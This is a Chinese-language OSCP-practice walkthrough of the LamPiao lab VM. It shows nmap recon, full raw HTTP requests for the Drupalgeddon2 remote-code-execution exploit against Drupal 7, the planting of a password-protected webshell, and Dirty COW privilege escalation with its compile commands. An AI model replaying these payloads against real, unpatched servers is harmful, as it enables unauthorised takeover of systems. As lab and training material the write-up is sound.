LamPiao靶機work_through

前言

oscp靶機系列的第二篇。只追求作出來的話，這靶機蠻簡單的。可是爲了提高難度，儘可能避免使用msf——畢竟考試只准用一次嘛，本身寫了個exp。

正文

主機發現

nmap -sP 192.168.218.0/24

發現靶機IP 192.168.218.132

nmap -sV -A -p- 192.168.218.132

Nmap scan report for 192.168.218.132
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
80/tcp   open  http?
| fingerprint-strings:
|   NULL:
|     _____ _ _
|     |_|/ ___ ___ __ _ ___ _ _
|     \x20| __/ (_| __ \x20|_| |_
|     ___/ __| |___/ ___|__,_|___/__, ( )
|     |___/
|     ______ _ _ _
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o

訪問80端口，只有一個畫
1898端口，訪問CHANGELOG.txt 獲得drupal具體版本號7.54 2017-02-01
看樣子能直接打drupalgeddon2 RCE了。
msf果真一把梭哈，留了個小馬s.php 密碼pass
尋找suid提權
上傳Linux-exploit-suggester.sh,髒牛能夠提權
有趣的是pocsuite3並無檢測處drupalgeddon2 ，可是msf能夠打。讓咱們好好分析一下

tcpdump -w data.pcap -i eth0 -nn -s0 host 192.168.218.132

抓取msf 打的流量，wireshark 篩選http協議

再看了分析文章以後能夠說很顯然了，pocsuite3的只是drupal8的payload，並不包括drupal7

咱們手動打一下

POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=user/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1
Connection: close

_triggering_element_name=name&form_id=user_pass

POST /?q=file/ajax/name/%23default_value/form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=file/ajax/name/%23default_value/form-6JI87Jaq17bIYgG2BkOA_gVnNtWRyJTmwnw1VbqEMp4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1; SESS07faf6555595fd9ed723577c1f01f9ec=rh2r55VofVS2NiqKCduex2bKVZVqXR5Q4ImL6p42ZxM
Connection: close

form_build_id=form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls

翻閱msf的exp和其餘公開資料，本身寫了一個pocsuite3的exp.
項目地址
成功寫入webshell,寫的直接彈shell沒接到。

從虛擬終端反彈shell，發現跟以前的問題同樣，ret=2彈不出來——多是我環境問題吧。msf弄個正向shell

提權

./lnux-exploits-suggester.sh

除了版本還有其餘條件的先跳過，高可能的就是dirtycow(40611),dirtycow2(40847)

40611這注釋這一段操做沒看懂要幹嗎

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w

執行結果foo也是www-data權限和它不同

，用40847吧，這個註釋直接給了編譯語句，沒別的啥

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow

後記

msf流量其實仍是有些疑惑。在tcp流中看到先寫入一個php文件，後續流量都不是明文的。HTTP請求只有截圖中的：查看版本，執行了一條命令，但這條命令是printf，是怎麼寫文件的？